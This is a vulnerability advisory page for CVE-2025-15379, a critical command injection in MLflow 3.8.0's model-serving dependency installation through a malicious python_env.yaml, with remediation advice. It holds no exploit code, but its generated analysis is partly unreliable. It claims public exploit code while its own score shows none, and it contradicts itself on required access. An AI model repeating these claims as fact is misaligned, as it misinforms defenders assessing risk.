CVE-2025-15379

| EUVD-2025-209121 CRITICAL
2026-03-30 @huntr_ai GHSA-r23q-823p-vmf7
10.0
CVSS 3.0
Share

CVSS Vector

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
Changed
Confidentiality
High
Integrity
High
Availability
High

Lifecycle Timeline

4
Patch Released
Apr 01, 2026 - 02:30 nvd
Patch available
EUVD ID Assigned
Mar 30, 2026 - 07:30 euvd
EUVD-2025-209121
Analysis Generated
Mar 30, 2026 - 07:30 vuln.today
CVE Published
Mar 30, 2026 - 07:16 nvd
CRITICAL 10.0

Description

A command injection vulnerability exists in MLflow's model serving container initialization code, specifically in the `_install_model_dependencies_to_env()` function. When deploying a model with `env_manager=LOCAL`, MLflow reads dependency specifications from the model artifact's `python_env.yaml` file and directly interpolates them into a shell command without sanitization. This allows an attacker to supply a malicious model artifact and achieve arbitrary command execution on systems that deploy the model. The vulnerability affects versions 3.8.0 and is fixed in version 3.8.2.

Analysis

Critical command injection in MLflow 3.8.0 enables remote code execution during model deployment when attackers supply malicious artifacts via the env_manager=LOCAL parameter. The _install_model_dependencies_to_env() function unsafely interpolates dependency specifications from python_env.yaml directly into shell commands without sanitization. With CVSS 10.0 (network-accessible, no authentication, no complexity) and publicly available exploit code exists (reported via Huntr bug bounty, patched in 3.8.2), this represents an immediate critical risk for organizations using MLflow model serving infrastructure. EPSS data not available, but exploitation scenario is straightforward for adversaries with model deployment access.

Technical Context

MLflow is an open-source machine learning lifecycle platform that manages model deployment, serving, and dependency management. The vulnerability resides in the environment manager subsystem that handles Python dependency installation. When `env_manager=LOCAL` is specified during model deployment, MLflow parses the `python_env.yaml` file from model artifacts to determine required dependencies. The vulnerable function constructs shell commands by directly concatenating user-controlled dependency strings without input validation or command sanitization. This represents CWE-77 (Command Injection), a critical flaw class where externally-influenced input modifies the intended command string. The affected product MLflow version 3.8.0 uses Python's subprocess or shell invocation mechanisms that interpret special characters and command separators (semicolons, pipes, backticks), allowing attackers to inject arbitrary commands. Model artifacts in MLflow are typically stored as directories containing metadata files, making the `python_env.yaml` file a trusted input surface that was incorrectly assumed safe.

Affected Products

The vulnerability affects MLflow version 3.8.0 specifically, identified under CPE 2.3:a:mlflow:mlflow/mlflow:*:*:*:*:*:*:*:*. MLflow is an open-source machine learning operations platform developed by Databricks and widely deployed across data science and ML engineering environments. Organizations running MLflow model serving infrastructure with version 3.8.0 are vulnerable when deploying models that specify env_manager=LOCAL in their configuration. The vulnerability is isolated to this single version, as the issue was introduced and fixed within a tight release window. Detailed vulnerability disclosure and patch information available at Huntr bounty platform (https://huntr.com/bounties/dc9c1c20-7879-4050-87df-4d095fe5ca75) and the fix commit in the MLflow GitHub repository (https://github.com/mlflow/mlflow/commit/361b6f620adf98385c6721e384fb5ef9a30bb05e).

Remediation

Organizations must immediately upgrade MLflow to version 3.8.2 or later, which contains the complete fix for the command injection vulnerability as documented in commit 361b6f620adf98385c6721e384fb5ef9a30bb05e. The upstream fix available via the GitHub repository implements proper input sanitization in the _install_model_dependencies_to_env() function. For environments where immediate patching is not feasible, implement compensating controls including restricting model deployment permissions to trusted users only, implementing strict validation on model artifacts before deployment, avoiding the env_manager=LOCAL parameter if alternative environment managers are viable, and deploying models in isolated sandboxed containers with minimal privileges. Network segmentation should isolate MLflow model serving infrastructure from untrusted networks. Monitor MLflow deployment logs for suspicious dependency installation patterns or shell metacharacters in python_env.yaml files. Review all model artifacts deployed during the 3.8.0 version window for potential compromise indicators. Complete vendor advisory and technical details available at https://huntr.com/bounties/dc9c1c20-7879-4050-87df-4d095fe5ca75 with patch implementation at https://github.com/mlflow/mlflow/commit/361b6f620adf98385c6721e384fb5ef9a30bb05e.

Priority Score

50
Low Medium High Critical
KEV: 0
EPSS: +0.2
CVSS: +50
POC: 0

Vendor Status

Share

CVE-2025-15379 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy